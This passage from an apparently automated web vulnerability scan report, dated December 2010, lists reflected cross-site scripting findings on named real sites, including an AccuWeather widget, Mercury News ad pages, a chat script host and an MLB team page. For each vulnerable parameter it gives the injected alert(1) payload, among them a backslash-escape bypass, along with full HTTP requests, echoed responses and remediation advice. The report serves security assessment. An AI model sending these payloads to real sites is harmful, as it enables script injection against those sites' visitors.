User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:16:54 GMT
Server: PWS/1.7.1.1
X-Px: ms dal-lv3-n3 ( dal-lv3-n21), ms dal-lv3-n21 ( origin>CONN)
Cache-Control: max-age=3240
Expires: Wed, 08 Dec 2010 01:10:54 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... Type; return ret; }
The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e5df"%3balert(1)//4890edfd2c was submitted in the logo parameter. This input was echoed as 5e5df";alert(1)//4890edfd2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=15e5df"%3balert(1)//4890edfd2c&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:15:16 GMT
Server: PWS/1.7.1.1
X-Px: ms dal-lv3-n3 ( dal-lv3-n10), ms dal-lv3-n10 ( origin>CONN)
Cache-Control: max-age=2760
Expires: Wed, 08 Dec 2010 01:01:16 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3911
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=15e5df";alert(1)//4890edfd2c&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=15e5df";ale ...[SNIP]...
The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45f58"%3balert(1)//c3b68db3e85 was submitted in the metric parameter. This input was echoed as 45f58";alert(1)//c3b68db3e85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=045f58"%3balert(1)//c3b68db3e85&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:17:58 GMT
Server: PWS/1.7.1.1
X-Px: ms dal-lv3-n3 ( dal-lv3-n31), ms dal-lv3-n31 ( origin>CONN)
Cache-Control: max-age=3480
Expires: Wed, 08 Dec 2010 01:15:58 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... edAttrs["type"] = mimeType; return ret; }
The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7461a"%3balert(1)//8118313683 was submitted in the partner parameter. This input was echoed as 7461a";alert(1)//8118313683 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather7461a"%3balert(1)//8118313683&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:14:39 GMT
Server: PWS/1.7.1.1
X-Px: ms dal-lv3-n3 ( dal-lv3-n18), ms dal-lv3-n18 ( origin>CONN)
Cache-Control: max-age=3240
Expires: Wed, 08 Dec 2010 01:08:39 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3911
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... nversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather7461a";alert(1)//8118313683&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather7461a";ale ...[SNIP]...
The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47ef2"%3balert(1)//ccf56ab61e2 was submitted in the tStyle parameter. This input was echoed as 47ef2";alert(1)//ccf56ab61e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal47ef2"%3balert(1)//ccf56ab61e2&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:14:57 GMT
Server: PWS/1.7.1.1
X-Px: ms dal-lv3-n3 ( dal-lv3-n26), ms dal-lv3-n26 ( origin>CONN)
Cache-Control: max-age=3480
Expires: Wed, 08 Dec 2010 01:12:58 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal47ef2";alert(1)//ccf56ab61e2&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal47ef2";ale ...[SNIP]...
The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94a41"%3balert(1)//31436bfb76f was submitted in the target parameter. This input was echoed as 94a41";alert(1)//31436bfb76f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self94a41"%3balert(1)//31436bfb76f HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:18:28 GMT
Server: PWS/1.7.1.1
X-Px: ms dal-lv3-n3 ( dal-lv3-n24), ms dal-lv3-n24 ( origin>CONN)
Cache-Control: max-age=3480
Expires: Wed, 08 Dec 2010 01:16:28 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... "] = mimeType; return ret; }
The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3e53"%3balert(1)//b6f49f11fc was submitted in the theme parameter. This input was echoed as e3e53";alert(1)//b6f49f11fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=cloudse3e53"%3balert(1)//b6f49f11fc&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:17:39 GMT
Server: PWS/1.7.1.1
X-Px: ms dal-lv3-n3 ( dal-lv3-n19), ms dal-lv3-n19 ( origin>CONN)
Cache-Control: max-age=3240
Expires: Wed, 08 Dec 2010 01:11:39 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3911
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ) ret.embedAttrs["type"] = mimeType; return ret; }
The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa00a"%3balert(1)//9f65affc6bd was submitted in the zipcode parameter. This input was echoed as fa00a";alert(1)//9f65affc6bd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025fa00a"%3balert(1)//9f65affc6bd&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.consumertipsdaily6.com/debt/?n=215&k=California+Newspaper+Group
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:16:06 GMT
Server: PWS/1.7.1.1
X-Px: ms dal-lv3-n3 ( dal-lv3-n15), ms dal-lv3-n15 ( origin>CONN)
Cache-Control: max-age=3120
Expires: Wed, 08 Dec 2010 01:08:07 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... uginsPage; if (mimeType) ret.embedAttrs["type"] = mimeType; return ret; }
The value of the funnelid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 762fa"><script>alert(1)</script>7aa6c6676ce was submitted in the funnelid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /default-js.asp?view=0&funnelid=F180762fa"><script>alert(1)</script>7aa6c6676ce&a=b&siteid=APS&vid=ctt_id=&ctt_adnw=&ctt_ch=&ctt_entity=&ctt_cli=&ctt_kw=&ctt_adid=&ctt_nwtype= HTTP/1.1
Host: news1reports.com
Proxy-Connection: keep-alive
Referer: http://m.mercurynews.com/cb/473/subscribe.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32513
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQSATSCTR=LBCNKEOCDLCJMIHPBPGIBDFE; path=/
X-Powered-By: ASP.NET
Date: Wed, 08 Dec 2010 00:14:33 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
The value of the funnelid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d872'%3balert(1)//fdded8688d4 was submitted in the funnelid parameter. This input was echoed as 5d872';alert(1)//fdded8688d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /default-js.asp?view=0&funnelid=F1805d872'%3balert(1)//fdded8688d4&a=b&siteid=APS&vid=ctt_id=&ctt_adnw=&ctt_ch=&ctt_entity=&ctt_cli=&ctt_kw=&ctt_adid=&ctt_nwtype= HTTP/1.1
Host: news1reports.com
Proxy-Connection: keep-alive
Referer: http://m.mercurynews.com/cb/473/subscribe.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32363
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQSATSCTR=OBCNKEOCHMCPPNJPHOPBLNIG; path=/
X-Powered-By: ASP.NET
Date: Wed, 08 Dec 2010 00:14:34 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv ...[SNIP]... cript'>var areYouReallySure = false;var internalLink = false;function areYouSure() {if (!areYouReallySure && !internalLink) {areYouReallySure = true;location.href='http://automaticprofitsystem.com/F1805d872';alert(1)//fdded8688d4/info.asp?fromep=Y';return 'Are you sure you dont want to take advantage of the Automatic Profit System?\n\nDont forget ... this will only be available for a limited time. Since there is a 365 day mone ...[SNIP]...
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e07be\'%3balert(1)//69c8bc07316 was submitted in the version parameter. This input was echoed as e07be\\';alert(1)//69c8bc07316 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /FSI/AllPages.aspx?advid=200177&loc=53824&fsi=14927&version=Mercurye07be\'%3balert(1)//69c8bc07316&facing=false HTTP/1.1
Host: newspaperads.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-326766520-1291762315669;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 08 Dec 2010 01:09:52 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: HW3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]... '; s_az.server = 'newspaperads.mercurynews.com';
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82146\'%3balert(1)//d8c3dcadec7 was submitted in the version parameter. This input was echoed as 82146\\';alert(1)//d8c3dcadec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /FSI/Brands.aspx?advid=200177&loc=53824&fsi=14927&version=Mercury82146\'%3balert(1)//d8c3dcadec7&facing=false HTTP/1.1
Host: newspaperads.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-326766520-1291762315669;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 08 Dec 2010 01:10:00 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: HW3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47097
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <HTML lang="en"> <HEAD>
The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7539\'%3balert(1)//87dbe24d64b was submitted in the version parameter. This input was echoed as b7539\\';alert(1)//87dbe24d64b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /FSI/Page.aspx?advid=200177&loc=53824&fsi=14927&facing=false&version=Mercuryb7539\'%3balert(1)//87dbe24d64b HTTP/1.1
Host: newspaperads.mercurynews.com
Proxy-Connection: keep-alive
Referer: http://ads.yldmgrimg.net/apex/mediastore/93e8d828-2c6f-42fb-b852-7b8b0226097a
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-326766520-1291762315669; location=53824
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Wed, 08 Dec 2010 00:17:05 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Server-Name: HW3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 48110
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]... newspaperads.mercurynews.com';
The value of the refer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f271e\'%3balert(1)//a250fd91b21 was submitted in the refer parameter. This input was echoed as f271e\\';alert(1)//a250fd91b21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /shared/EmailAFriend.aspx?refer=http%3A%2F%2Fnewspaperads.mercurynews.com%2FROP%2Fads.aspx%3Fadvid%3D36689%26a%3DFremont%2BToyotaf271e\'%3balert(1)//a250fd91b21 HTTP/1.1
Host: newspaperads.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-326766520-1291762315669;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 08 Dec 2010 01:09:48 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: HW3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19481
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/2000/rec-xhtml1-20000126/dtd/xhtml1-transitional.dtd">
The value of the button request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7411a"%3balert(1)//80df5942092 was submitted in the button parameter. This input was echoed as 7411a";alert(1)//80df5942092 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /script.js?sid=756&button=chat7411a"%3balert(1)//80df5942092 HTTP/1.1
Host: rtn.fididel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 01:12:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=lfkg47j6env7cmuke2ld0ao7j4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript
Content-Length: 14348
var seller_available = true; var BUTTON_TYPE = "default"; var request_type = "chat"; var BUTTON_IMAGE = "chat7411a";alert(1)//80df5942092"; var seller_id = 756; var BUTTON_URL = "https://rtn.fididel.com/"; var login_details = ""; var fididel_url = BUTTON_URL + "rtn/chat/seller/756/source/";
The value of the c_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13d0d"><script>alert(1)</script>aa72252b172 was submitted in the c_id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.jsp?c_id=sf13d0d"><script>alert(1)</script>aa72252b172 HTTP/1.1
Host: sanfrancisco.giants.mlb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=589
Expires: Wed, 08 Dec 2010 01:22:11 GMT
Date: Wed, 08 Dec 2010 01:12:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http:/ ...[SNIP]... <meta property="og:url" content="http://mlb.mlb.com/index.jsp?c_id=sf13d0d"><script>alert(1)</script>aa72252b172&tcid=fb_share" /> ...[SNIP]...
4.81. http://sanfrancisco.giants.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sanfrancisco.giants.mlb.com
Path: /index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aec3c"><script>alert(1)</script>eaa73b89501 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.jsp?aec3c"><script>alert(1)</script>eaa73b89501=1 HTTP/1.1
Host: sanfrancisco.giants.mlb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=600
Expires: Wed, 08 Dec 2010 01:22:18 GMT
Date: Wed, 08 Dec 2010 01:12:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 128728
